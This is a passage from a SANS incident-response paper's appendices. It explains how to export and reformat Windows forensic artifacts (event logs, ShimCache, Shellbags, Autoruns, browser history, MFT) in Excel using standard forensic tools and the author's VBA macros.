Microsoft Excel. (n.d.). In Wikipedia. Retrieved November 18, 2016, from 
https://en.wikipedia.org/wiki/Microsoft_Excel#Macro_programming    
Nemeth, E., Snyder, G.,  Hein, T., &  Whaley, B. (2010). Unix and Linux System 
Administration Handbook, Fourth Edition . Prentice Hill  
Parisi, T. (2015, June 17). Caching out: The value of shimcache for investigators « 
Threat Research Blog | FireEye Inc . Retrieved from 
https://www.fireeye.com/blog/threat -research/2015/06/caching_out_the_val.html  
Roesch, M. (2003). Network intrusion detection system mode | NIDS mode output 
options . Retrieved from http://manual -snort -org.s3 -website -us-east-
1.amazonaws.com/node6.html  
Russin ovich, M., & Margosis, A. (2011). Windows Sysinternals Administrator's 
Reference . McGraw -Hill 
Windows event log essentials - Windows event log FAQ. Basic explanation of Windows 
event logs. (n.d.). Retrieved from 
https://eventlogxp.com/essentials/windowseve ntlog.html   
© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 3
8 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	8. Appendix  
 
8.1. Appendix A - Open Source Tools  
Here is a listing of the tools used in this document:  
• NOTEPAD++ , v7.3.2 ( https://notepad -plus-plus.org/ ) 
• Shellbags Explorer , v0.7.0.0 ( http://binaryforay.blogspot.com/p/software.html ) 
• Bro, v2.5  (https://www.bro.org/ ) 
• Snort , v2.9.9.0 ( https://www.snort.org/ ) 
• IPTables , v1.6.1  (https://git.netfilter.org/iptables/ ) 
• Wevtutil.exe, v6.1.7600.16385 (Native Windows 7 tool)  
• Autorunsc.exe , v13.7 ( https://technet.microsoft.com/en -us/sysinternals/bb842062 ) 
• Shimcacheparser.py , v1.0 ( https://git hub.com/mandiant/ShimCacheParser)  
• Pasco.exe , v1.0 (https://www.mcafee.com/us/downloads/free -tools/pasco.aspx ) 
• analyzeMFT , v2.0.18 ( https://github.com/dkovar/analyzeMFT ) 
• parse_prefetch_info, v1.5 (http://redwolfcomputerforensics.com  – dead link)  
• Wireshark , v2.2.4 ( https://www.wireshark.org/ ) 
• CYGWIN, v2.7.0. (https://www.cygwin.com/ ) 
Within CYGWIN Environment:  
o SED - https://www.gnu.org/software/sed/   
o CUT – part of https://www.gnu.org/software/coreutils/coreutils.html  
o CAT – part of https://www.gnu.org/software/coreutils/coreutils.html  
 
© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 3
9 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	8.2. Appendix B – Resources  
Here is a listing of books and blog web sites that I ha ve found beneficial in  
learning  Excel and VBA Programming : 
• Excel 2013 Power Programming with VBA by John Walkenback  
• Excel 2013 Bible by John Walkenback  
• http://analysistabs.com/  
• https://powerspreadsheets.com/  
• http://stackoverflow.com/  
• http://wellsr.com/  
• https://www.ablebits.com/  
• http://www.mrexcel.com/  
• https://www.techonthenet.com/excel/index.php  
• https://www.thespreadsheetguru.com  
8.3. Appendix C – Files  Available on GitHub  
I have provided code to automate much of the processes described in this 
document. If there are issues  running the code, check to make sure you are using  the 
same  version of software  listed in Appendix A .  
The VBA code is separated  up into two categories. One category contains 
individua l code for each of the log file s mentioned in this document along with  a few 
miscellaneous scripts for specific tasks.  The other category contains two ‘Master’ 
spreadsheets that comprise many of the individual scripts into one document for ease of 
execution . You can find the code  at https://github.com/gregory -lalla/GCIH_Gold  under 
the ‘Code’ directory.  Each category has two sub -categories . The sub -catego ries are 
explained below.  
Module Files:  
© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 4
0 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	The files under this sub -category are individual modules that can be added 
to macro -enabled  spreadsheets  (see Section 3.5  for directions on adding 
macros to a spreadsheet) . You can find the code at GitHub  site under the 
Code/Singles/Module_BAS_Files  directory. Each log file has code 
designed specifically for the output shown in this paper. There are four 
types of modules. The first  type will search the data for specific keywords 
and will have the word ‘keyw ord’ in  the file  name. The second type will 
search the data  for specific Event IDs and will have the wor d ‘EventID’ in 
the file name . The third type will format the data per the instructions 
provide in this paper and will contain the words ‘Standard_Format ’ in the 
file name . The last type will be code which is designed to perform a 
specific task and will not have any of the words mentioned above in the 
file name . The following is a list of the task specific macros and a 
description of each:  
• Binary_Hex2Ascii _Conversion_Module :  
This script will convert a column of hexadecimal encoded 
characters to human readable ASCII  encoding. This script 
will work on an XML export of Microsoft Event Viewer 
data.  
• Insert_Headers_Module:  
This script will insert the standard he aders described in this 
paper to the spreadsheets first row.  
• EventLogs_Application_CSV_Unique_IDs_per_Sheet_Module : 
This script will take each unique Event ID  and create an 
individual spreadsheet (tab) containing only those  Event 
IDs. This script will work  on a CSV export of Microsoft 
Event Viewer Application log data.  
• EventLogs_ Security _CSV_Unique_IDs_per_Sheet_Module : 
© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 4
1 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	This script will take each unique Event ID and create an 
individual spreadsheet (tab) containing only those Event 
IDs. This script will work on a CSV export of Microsoft 
Event Viewer Security log data.  
• EventLogs_ System _CSV_Unique_IDs_per_Sheet_Module : 
This script will take each unique Event ID and create an 
individual spreadsheet (tab) containing only those Event 
IDs. This script will work on a CSV export of Microsoft 
Event Viewer System log data.  
Macro Files:  
The files under this sub -category also contain  individual  scripts designed 
specifically for each log file. The scripts  here, however, are contained 
within a Macro -enabled  Excel file. There is a button on the first 
spreadsheet that will prompt the user to specify the log file they wish to 
process . The script will then run and produce a unique output file name 
based on the hostname that produced the log. These Excel files contain the 
same types of scripts mentioned above, except there are no task -specific 
modules for hexadecimal to ASCII  conversion or inserting of headers.  
You can find the code at the GitHub  site under the 
Code/Singles/ Excel_Macro _Files  directory.  
Singles Combined:  
The file  under this sub -category  is named ‘Master -Single.xlsm’ and 
combines all the code from the Macro Files sub -category. Each log file 
has its own button that when pushed will run the same code as the Macro 
Files sub -category. This fil e is available on the GitHub  site at 
https://github.com/gregory -
lalla/ GCIH_Gold/blob/master /Code/Combined/Singles_Combined/Master
-Single.xlsm . 
Master IOC Combined:  
© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 4
2 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	The file under this sub -category is named ‘ Master -IOC.xlsm’ and  has two 
differences from the  ‘Master -Single.xlsm’ document. First, the result of 
the script  not only writ es to a unique file, but is appended  to an overall 
Master IOC Excel file. When  opening the document, the user is prompted 
to either select a previously created Master IOC file or to create a new 
one. This file is then used to hold the results of all the scripts run. The 
other difference is that instead of a standard format button, there is a 
button to filter the results of each log file by date to remove data that is 
outside the ti meframe of an in cident. This file is available  on the GitHub  
site at https://github.com/gregory -
lalla/ GCIH_Gold/blob/master /Code/Combined/Master_IOC_Combined/M
aster -IOC.xlsm .  
There is also a documents directory located at https://github.com/gregory -
lalla/ GCIH_Gold/blob/master /Docs  with several subdirectories. The ‘Supplement ’ 
subdirectory contains a document named 
‘Additional_Log_Formatting_Instructions.docx ’ which co vers instructions for formatting 
the logs mentioned in Section 4.2 of this paper . It also contains a file named 
‘Pivote_Table_Example.docx’ which shows examples of the content discussed in Section 
3.6 of this paper. Last, there is a file named 
‘Complete_GIAC_GCIH_Gold_Paper_Greg_Lalla .docx’ which is the original document 
before it was edited to  fit the requirements of a  GIAC Gold Paper  (Because of file size 
limits on Github, the document has been compressed and split into three  files. You can 
recombine the compressed files with 7 -zip). The ‘Template’ subdirectory contains an 
Excel Macro -Enabled  Template named ‘ standard_format.xltm ’ you can use  when 
manipulating data from log file s not discussed  in this paper . The last sub directory in the 
‘Docs’ folder is ‘Worksheet_Functions .’ This folder contains a document named 
‘Worksheet_Functions_in_Paper.do cx’ which contains the worksheet functions used in 
this paper, along with a description of what each one accomplishes.  
The last directory at the root of the GitHub  page is named ‘Misc’ and contains the 
SED script  file named ‘ months.sed ,’ which fixes the Date/Time  fields of  Linux system 
© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 4
3 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	logs. You can find the SED script at https://github.com/gregory -
lalla/ GCIH_Gold/blob/master /Misc/SED_Month_Replacement_Filter/months.sed .  
8.4. Appendix D: Windows Logs  Explained  
For brevity, anything discussed previously  will be not be explained again  but only 
referenced.  
8.4.1.  Event Viewer Logs  
Because Event Viewer logs can contain hundreds of thousands of en tries, it is 
essential to reduce the data to a manageable level  before importing it into Excel . One way 
to do this is to  use XML filtering in Event Viewer Custom Views which is more efficient 
than filtering through the GUI. There are many types of expressions you can use,  but two 
of the more useful are sorting by timeframe and sorting by a username (See Figure 51 and 
52). F or more information about XML filtering , see the article at 
https://blogs.technet.microsoft.com/askds/2011/09/26/advanced -xml-filtering -in-the-
windows -event -viewer/ . 
 
Figure	 51.	Event	Viewer	XML	Timeframe	Filter.	(Lee,	2014,	digit al	case	files) 	

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 4
4 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 52.	Event	Viewer	XML	Username	Filter.	(Lee,	2014,	digital	case	files) 	
An even easier method, avoiding the slow GUI, is to use the native command line 
utility called WEVTUTIL.EXE to export the lo gs. This tool  comes with its  challenges 
such as producing XML files that Ex cel cannot open . When running the command, there 
are several options to massage the data to a format that Excel accepts . To get the correct 
results, you may need to mix and match the sw itches un til you get an XML file that 
imports into Excel . Here is an example of a command that you can  run which  filters the 
data based on a timeframe:  
wevtutil qe "<path_to_system.evtx>" /lf:true 
/q:"*[System[TimeCreated[@SystemTime>='2015 -07-10T00:00:00.000Z' an d 
@SystemTime<='2015 -07-13T23:59:59.999Z']]]" /f:RenderedXML /e:root > System.xml  
A final way to get the output you want from Event Viewer logs is to use 
Powershell, which is a topic beyond this paper, but well worth the effort to try and learn.  
Once you have  reduced  the data, you should then export it from the utility . Event 
Viewer offers four different  formats to export the data : .EVTX, .TXT, .CSV, and .XML 
(See Figure 33). This paper will look at the .CSV format and the .XML format. N either of 
these for mats include s all the information from the Event Viewer logs,  and the data may 
need to be combined to get a full picture of what occurred during each event.  

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 4
5 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 53.	Save	Filtered	Event	Viewer	 logs.	(Lee,	2014,	digital	case	fil es)	
In this section , two event logs  are shown , each with a slightly different output. 
With these two examples,  you can manipulate other  Event Viewer log s in a similar 
manner. First, the Security.evtx lo g, when exported as a .CSV file  produces cells with 
newline and carriage returns, which makes the data unwieldy. You will remove the  
carriage return character (ASCII Code 13) , and replace the newline character (ASCII 
Code 10) with  the ‘#’ character which will be  used as a delimiter to split the data into 
columns. You can automate this task  with the following Excel Function:  
=SUBSTITUTE(SUBSTITUTE(F2,CHAR(13),""),CHAR(10),"#") 	
Place the above fun ction in an empty cell adjacent to the cell that needs to have 
the newline and carriage retu rn characters replaced (Figure 5 4). The blank cell will then 
contain the new contents as its value, but will also contain the formula used in the 
function.  

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 4
6 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 54.	Remove	Newline	and	Carriage	Return	Characters	from	Cell	Contents.	(Lee,	2014,	digital 	case	files) 	
To produce a similar result in every cell in the column, highlight the ce ll with the 
function and double -click on the bott om right -hand corner of the cell. This action will 
copy the function to every cell in the column. The arguments used by t he function will be 
updated to reflect the correct cell locations  (Figure 55). 
 
Figure	 55.	Copy	Function	to	All	Cells	in	Column.	(Lee,	2014,	digital	case	files) 	
To prevent the function from being accidently changed and to make it easier to 
manipulate the contents of the cell, the values within the new cells will be copied and 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 4
7 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	pasted over the formula. To perform this action, s elect the entire column that contains the 
functions, right click the highlighted cells, select ‘Copy ,’ right  click the highlighted cells 
again and select the ‘Paste Value’ icon which has the numbers 123 in the image (Figure 
56). 
 
Figure	 56.	Copy	and	Paste	Value	of	cell	over	the	Function	in	the	cell.	(Lee,	2014,	digital	case	files) 	
With the data copied to a new column in the correct format, you can delete the 
original  column . Since the new column has a delimiter of ‘#’ in the data, the ‘Text to 
Column’ feature on the ‘Data’ ribbon can be used to separate  the data into multiple 
columns  (Figure 57). 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 4
8 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 57.	Text	to	Columns.	(Lee,	2014,	digital	case	files) 	
On the ‘Text to Columns’ wizard, select the defaults on Step 1 and 3. On ‘Convert 
Text to Columns Wizard – Step 2 of 3’ only check ‘Other:’ under ‘Delimiters .’ In the box 
next to ‘Other:’ type the ‘#’ character. Also , make sure the ‘Treat consecutive delimiters 
as one’ checkbox is unchecked to keep data of a similar nature in the same columns 
(Figure 58).  
 
Figure	 58.	Text	to	Columns	 Delimited	(Lee,	2014,	digital	case	files) 	

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 4
9 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	The result should look like Figure 59 after ‘Wrap Text’ has been removed from 
the work sheet  cells. 
 
Figure	 59.	Text	to	Columns	Result.	(Lee,	2014,	digital	case	files) 	
These actions should line up most of the data correctly, but you will find there are 
some columns with extra data or missing data. Here you’ll need to do some manual work 
to get the data correctly aligned. First , run the Standard Format  macro to better view the 
data. You need to keep in mind the data you want to retain, relative the Column Header 
names. Of the five headers already pr esent, keep the ‘Date and Time’; ‘Source’;  and 
‘Event ID’ columns. The other two columns can be deleted (Figure 60).  

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 5
0 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 60.	Keep	the	‘Date	and	Time’	column	and	‘Event	ID’	column.	(Lee,	2014,	digital	case	files) 	
Change the ‘Date and Time’ column header to ‘ Date/Time ,’ the ‘Source’ header 
to ‘Artifact’ and the ‘Event ID’ header to ‘Properties .’ To understand what the val ue of 
the cell s under ‘Properties’ represent, prefix each cell with the string ‘Event ID:  ’ (Figure 
61). You can do this by using the following function:  
=“Event ID: ”&B2  
 
Figure	 61.	Prefix	cell	value	with	a	string.	(Lee,	2014,	 digital	case	files) 	

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 5
1 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	Follow the steps outlined previously (the substitute function instructions near 
Figure 54) to get the desired results as show n in Figure 62. 
 
Figure	 62.	Date/Time	and	Properties	columns.	(Lee,	2014,	digital	cas e	files) 	
Using the filter dropdown arrows in each column header cell, delete columns that 
clearly  don’t contain information of value. Next, find the columns that correspond to the 
remaining Column Headers and label them accordingly. Finally , delete the col umns that 
are not labeled. Remember, to make this process immensely easier, reduce as much data 
first by getting rid of rows based off the timeframe, keywords , and Event IDs you know 
will not contain information related  to the intrusion. The final output w ould look like 
Figure 63 after putting the columns in the correct order.  

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 5
2 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 63.	The	f inal	output	of	 the	CSV	export	data.	(Lee,	2014,	digital	case	files) 	
The second type of expor t from an Event Viewer log  that we will  look at is the 
XML format. This output is a lot easier to examine since there are already tags defining 
each column . As before, you export Event Viewer log s in the XML format by  selecting 
‘Save All Events  As...’ or ‘Save Filtered Log File As...’  and choosing  XML in the 'Save 
as type'  dropdown list (Figure 53). Import the resulting .XML file into Microsoft Excel. 
You will get a popup box asking how to import the data. Select ‘As an XML Table’ and 
click on the ’OK’ button (Figure 64). 
 
Figure	 64.	Open	.xml	file	as	an	XML	Table.	(Lee,	2014,	digital	case	files) 	
Once you have imported the data, it will look like Figure 65. 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 5
3 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 65.	Imported	XML	file	as	a	Table.	(Lee,	2014,	digital	case	files) 	
One issue is the Date/Ti me format, which separates the date and time with the 
letter ‘T’ and includes milliseconds followed by the letter ‘Z .’ A function will be used to 
get the correct format of ‘ mm/dd/yyyy hh:mm:ss ’. To make manipulating the data easier, 
you will convert the ta ble to a normal range. This conversion can be done by selecting the 
‘Convert to Range ’ button on the ‘Table Tools’ ribbon and selecting ‘Yes’ on the popup 
window (Figure 66). 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 5
4 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 66.	Convert	Table	to	a	Range.	(Lee,	2014,	 digital	case	files) 	
In order prevent confusion from the highlighting of artifacts related to the 
incident, you should remove the formatting left over from the table  layout  (Figure 67).  
 
Figure	 67.	Clear	Table	Formatting.	(Lee,	20 14,	digital	case	files) 	
To fix the Date/Time formatting, you can use the following function (Figure 68): 
=0+SUBSTITUTE(SUBSTITUTE((MID(I2,1,19)),"T"," ")," -","/")  

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 5
5 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 68.	Function	for	Date/Time	Formatting.	(Lee,	2014,	digital	 case	files) 	
 This function will display the Date/Time in number format. Apply the 
‘mm/dd/yyyy hh:mm:ss ’ format to the column for proper display.  
Another issue you may run into is that some of the data is hex encoded (Figure 
69). To convert the hex data to human readable ASCII data, you can run the  
‘Binary_Hex2Ascii_Conversion_Module .bas’ code  (https://github.com/gregory -
lalla/ GCIH_Gold/blob/master /Code/Singles/Module_BAS_Files/Misc/Binary_Hex2Ascii
_Conversion_Module.bas ) (Figure 70). 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 5
6 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 69.	Hex	Encoded	Data.	(Lee,	2014,	digital	case	files) 	
 
Figure	 70.	Hex	Data	Converted	to	ASCII	Data.	(Lee,	2014,	digital	case	files) 	
Once you have fixed all the data conversion issues , it is a simple matter  of finding 
the columns to keep, applying the headers, formatting the spreadsheet and putting the 
columns in the correct order (Figure 71). Once complete, you can begin to search  for 
artifacts of interest.  

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 5
7 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 71.	Final	Format ted	Spreadsheet	from	XML	Data.	(Lee,	2014,	digital	case	files) 	
One last note on XML exported data. Each row does not correspond with only 
one Event Viewer log  entry. There are multiple rows for each Event Viewer log  entry 
identified by an ‘EventRecordID’ a s shown in Figure 72. Therefore, when there is a hit 
on a keyword search, don’t just copy over that one row to the master IOC file, but all the 
rows that have the same ‘EventRecordID’ number.  
 
Figure	 72.	Event	Record	IDs	in	XML	Ex ported	Data.	(Lee,	2014,	digital	case	files) 	

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 5
8 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	8.4.2.  ShimCache Entries  
We produced t he ShimCache output used in this example by running the 
ShimCacheParser  python tool against a Windows 7 SYSTEM registry file:  
ShimCacheParser.py -i system -o System_Shim.csv  
Open the .CSV output file in Exce l and then save it as an Excel macro-enabled  
workbook file with an .XLSM file extension . Apply the Standard Format  macro for a 
consistent look. (Figure 73). 
 
Figure	 73.	Parsed	ShimCache	Data	Standard	Lo ok.	(Lee,	2014,	digital	case	files) 	
In this data, there are a few things to note. First, si nce the date and time represent  
the Last Modified date of the executable, in the ‘ Miscellaneous ’ column it will be noted 
as such so that there is less confusion when  looking at the final data in a timeline of 
events. Second, the ‘Exec Flag’ column needs to express that statement to understand 
what the ‘TRUE’ and ‘FALSE’ entries represent . Third, since there are not enough 
columns to match the headers we want, it is OK  to leave the cells blank under those extra 
headers. Finally, we need to insert  a column for the name of the computer . The final view 
of the ShimCache Excel spreadsheet should look like Figure 74. 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 5
9 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 74.	ShimCache	Final	Forma tting.	(Lee,	2014,	digital	case	files) 	
8.4.3.  Shellbags  
We produced the She llbags  output used in this example by running the Shellbags 
Explorer tool against a Windows 7 USRCLASS.DAT registry file:  
Sbecmd.exe --timezone=”UTC” –d <path to directory containing usrclass.dat>  
The output of the above command produces a tab delimited file with a .TSV 
extension . Import  the file into Excel, choose TAB as the delimiter in the ‘Text Import 
Wizard’ and sa ve it as an .XLSM file to run Macro’s against the data (Figure 75).  
 
Figure	 75.	Shellbags	.TSV	file	imported	into	Excel.	(Lee,	2014,	digital	case	files) 	

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 6
0 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	Apply the Standard Format  macro and delete the following columns in this order: 
R, O, N, M, J, I, H, G, F, D, C, B, A. You’ll notice that the d ates include a UTC offset 
value of ‘+00:00’ (Figure 76). This value will need to be removed to have  the Date/Time  
column proper ly formatted . The removal of the offset  can be done with a simple search 
and replace.  
 
Figure	 76.	Dates 	contain 	a	UTC	Offset.	(Lee,	2014,	digital	case	files) 	
After removing the offset and formatting the date and times correctly, the result 
should look like Figure 77. 
 
Figure	 77.	Standard	Format	with	Dates	and	Times	fixed.	(Lee,	 2014,	digital	case	files) 	

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 6
1 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	There are six columns of Dates and Times. For thi s paper, the information  sought  
is the first date the resource was accessed and the last date the resource was accessed. 
Manually going through all the entries and getting those two  dates for each r esource 
would consume too much time . To make finding  the two dates  and sorting the Date/Time 
column  easier, we have provided VBA code on the GitHub  site called 
‘Shellbags_Standard_Format_Module.bas ’  (https://github.com/gregory -
lalla/ GCIH_ Gold/blob/master /Code/Singles/Module_BAS_Files/Shellbags/Shellbags_Sta
ndard_Format_Module.bas ) which will automatically do the work  for you. The script will 
produce two rows for each entry. One for the first time it was accessed and one for the 
last time i t was accessed. If there  is only one date for the entry  or the dates shown are the 
same or within 3 seconds of each other, then only one row will be produced for that 
entry. Figure 78 shows the result of running the VBA code. 
 
Figure	 78.	Shellbags	View	after	running	Shellbags_Date_Sorter	code.	(Lee,	2014,	digital	case	files) 	
8.4.4.  AutoRun Entries  
To parse autorun  data, we run the autorunsc.exe command against the registry 
files of a system. This parsing can be done offline by mounting an image of the system 
and pointing the tool to the mapped drive:  
Autorunsc.exe -a * -c -m -s -z M:\Windows M: \Users \<profilename> > 
autoruns_profilename.csv  
The options in the above command are:  

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 6
2 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	-a *:    Check All  
-c:    C VS output - need to direct to a file  
-m:    Hide Microsoft Verified Signed  
-s:    Check signature  
-z:    offline analysis  
 
Open the resulting .CSV file in Excel and apply the standard formatting  (Figure 
79). 
 
Figure	 79.	Autoruns	Standard	 Formatting .	(Lee,	2014,	digital	case	files) 	
You should delete t he following columns: Enabled, Category, Publisher, MD5, 
SHA -1, and SHA -256. Two columns, ‘Entry Location’ and ‘Entry’ can be combined into 
one column to preserve data that might not fit into the suggested columns used in this 
paper (Figure 80).  

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 6
3 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 80.	Combine	Entry	Location	and	Entry .	(Lee,	2014,	digital	case	files) 	
The combined columns should look like Column A in Figure 81. 
 
Figure	 81.	The	r esult	of	Combining	 Columns. 	(Lee,	2014,	digital	case	files) 	
8.4.5.  Web Browser Logs  
The example in this section will use the tool PASCO to parse the I nternet 
Explorer  files:  
pasco.exe <path>  

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 6
4 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	After  you run the above command , open the resulting TSV file in Excel using tab 
as the delimiter. You should manually delete the first two rows which are not needed 
(Figure 82). 
 
Figure	 82.	Delete	first	two	rows.	(Lee,	2014,	digital	case	files) 	
You should delete t he following columns: Modified Time, and Directory. Change 
the ‘ACCESS TIME’ column formatting to ‘mm/dd/yyyy hh:mm:ss’ and move th at 
column to Column ‘A .’ Apply the standard formatting and headers and then manually fill 
in the missing values  in the empty colu mns. Once complete, it should appear like Figure 
83. 
 
Figure	 83.	Final	look.	(Lee,	2014,	digital	case	files) 	

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 6
5 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	8.4.6.  MFT Entries  
We produced the MFT  output used in this example by running the analyzeMFT 
python tool against a Windows 7 $MFT file:  
C:\Python27 \python.exe analyzeMFT.py -f $MFT -w –o MFT.csv  
After running this command and importing  the .CSV  output file in to Excel, you’ll 
notice that there is a lot of data. You’ll also notice that the Date/Time values are not in 
the correct format which will need to  be corrected (Figure 84).  
 
Figure	 84.	Correct	Date/Time	values.	(Lee,	2014,	digital	 case	files) 	
You will delete m ost of the columns in this spreadsheet as they will not be used in 
the analysis . The only columns you should keep are those titled: Record Number; 
Filename #1; Std Info Creation date; Std Info Modification date; Std Info Entry date; FN 
Info Creation date; FN Info Modification date; and FN Info Entry date (Figure 85). 

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 6
6 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 85.	Columns	to	keep.	(Lee,	2014,	digital	case	files) 	
The output from parsing the MFT file will most likely contain m issing or corr upt 
information. You can identify r ows containing this bad data by examining the ‘Filename 
#1’ column for cells that contain either the string “NoFNRecord” or “Corrupt MFT 
Record” (Figure 86). 
 
Figure	 86.	Corrupt	data.	(Lee,	2014, 	digital	case	files) 	
These entries can easily be removed by using the filter button on the ‘Filename 
#1’ column and filtering on those two phrases (Figure 87).  

© 2017 The SANS Institute, Author Retains Full Rights
© 2017 The SANS Institute Author retains full rights. Hunting through Big Data with Excel	 6
7 	
Microsoft	Office	User Microsoft	Office	User Greg	Lalla,	greg.lalla@mail.comMicrosoft	
Office	User 	 	 	 
Figure	 87.	Filter	out	corrupt	data.	(Lee,	2014,	digital	case	files) 	
Once you identify all the rows with those phrases , merely  select them all and 
delete them (Figure 88). 
 
Figure	 88.	Delete	corrupt	data.	(Lee,	2014,	digital	case	files) 	
There  are still too many columns to fit into our standard layo ut and too many 
timestamps to incorporate them all in a timeline chronology. To fix the layout , we select 
the ‘FN Info Creation date’ column to represent the chronology of the MFT entries , and 
we combine the remaining timestamp s into two columns, one for t he ‘Std Info’ 
timestamps and one for the remaining ‘FN Info’ timestamps (Figure 89). 

© 2017 The SANS Institute, Author Retains Full Rights
